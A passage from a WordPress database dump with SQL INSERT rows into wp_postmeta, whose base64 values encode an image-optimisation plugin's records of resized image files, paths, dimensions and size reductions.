29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ1Mk4tMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NTJOLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDUyTi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDQ5LCJ0aW1lIjoxNDgzNTY1MjIyLCJpZCI6MTc0OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NTJOLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDUyTi0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTQ1Mk4tMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjUwOCwidGltZSI6MTQ4MzU2NTIyNSwiaWQiOjE3NDl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDUyTi01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ1Mk4tNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy00NTJOLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxNDk0LCJ0aW1lIjoxNDgzNTY1MjI5LCJpZCI6MTc0OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ1Mk4tMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NTJOLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDUyTi0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NDA1LCJ0aW1lIjoxNDgzNTY1MjMyLCJpZCI6MTc0OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ1Mk4tMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NTJOLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDUyTi0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NTYwLCJ0aW1lIjoxNDgzNTY1MjM2LCJpZCI6MTc0OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ1Mk4tMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NTJOLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDUyTi0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NTU0LCJ0aW1lIjoxNDgzNTY1MjM5LCJpZCI6MTc0OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ1Mk4tNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NTJOLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDUyTi00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6ODE1LCJ0aW1lIjoxNDgzNTY1MjQyLCJpZCI6MTc0OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ1Mk4tOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDUyTi05MHg5MC5qcGciLCJ3aWR0aCI6IjkwIiwiaGVpZ2h0IjoiOTAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDUyTi05MHg5MC5qcGciLCJyZWR1Y3Rpb24iOjM3MSwidGltZSI6MTQ4MzU2NTI0NiwiaWQiOjE3NDl9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29258, 1748, 'wpfc_optimisation_reduction', '26447'); 
INSERT INTO `wp_postmeta` VALUES (29259, 1748, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjgwLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjgwLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NjUyNTAsImlkIjoiMTc0OCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjgwLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjgwLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMjgwLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo5MTksInRpbWUiOjE0ODM1NjUyNTQsImlkIjoxNzQ4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTI4MC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTI4MC04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTI4MC04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MzA3OSwidGltZSI6MTQ4MzU2NTI1NywiaWQiOjE3NDh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjgwLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjgwLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMjgwLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoyNzQ1LCJ0aW1lIjoxNDgzNTY1MjYxLCJpZCI6MTc0OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yODAtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjgwLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0yODAtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MTMxMTksInRpbWUiOjE0ODM1NjUyNjUsImlkIjoxNzQ4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTI4MC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTI4MC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTI4MC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NjE1LCJ0aW1lIjoxNDgzNTY1MjY4LCJpZCI6MTc0OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yODAtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yODAtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0yODAtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjUyNywidGltZSI6MTQ4MzU2NTI3MSwiaWQiOjE3NDh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjgwLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjgwLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMjgwLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1OTQsInRpbWUiOjE0ODM1NjUyNzUsImlkIjoxNzQ4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTI4MC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTI4MC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTI4MC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTg4MCwidGltZSI6MTQ4MzU2NTI3OCwiaWQiOjE3NDh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yODAtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yODAtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0yODAtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjQxNiwidGltZSI6MTQ4MzU2NTI4MiwiaWQiOjE3NDh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yODAtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yODAtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0yODAtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjU1MiwidGltZSI6MTQ4MzU2NTI4NSwiaWQiOjE3NDh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yODAtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yODAtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0yODAtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjY0MywidGltZSI6MTQ4MzU2NTI4OCwiaWQiOjE3NDh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yODAtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yODAtNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0yODAtNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjk4MCwidGltZSI6MTQ4MzU2NTI5MiwiaWQiOjE3NDh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yODAtOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjgwLTkweDkwLmpwZyIsIndpZHRoIjoiOTAiLCJoZWlnaHQiOiI5MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0yODAtOTB4OTAuanBnIiwicmVkdWN0aW9uIjozNzgsInRpbWUiOjE0ODM1NjUyOTUsImlkIjoxNzQ4fV0='); 
INSERT INTO `wp_postmeta` VALUES (29260, 1747, 'wpfc_optimisation_reduction', '27072'); 
INSERT INTO `wp_postmeta` VALUES (29261, 1747, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjYwLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjYwLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NjUzMDAsImlkIjoiMTc0NyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjYwLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjYwLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMjYwLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo5MzgsInRpbWUiOjE0ODM1NjUzMDMsImlkIjoxNzQ3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTI2MC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTI2MC04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTI2MC04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MzEyNSwidGltZSI6MTQ4MzU2NTMwNiwiaWQiOjE3NDd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjYwLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjYwLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMjYwLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoyODA2LCJ0aW1lIjoxNDgzNTY1MzEwLCJpZCI6MTc0N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNjAtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjYwLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0yNjAtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MTM0NzksInRpbWUiOjE0ODM1NjUzMTUsImlkIjoxNzQ3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTI2MC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTI2MC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTI2MC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NjMwLCJ0aW1lIjoxNDgzNTY1MzIwLCJpZCI6MTc0N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNjAtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNjAtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0yNjAtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjUzMSwidGltZSI6MTQ4MzU2NTMyMywiaWQiOjE3NDd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjYwLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwi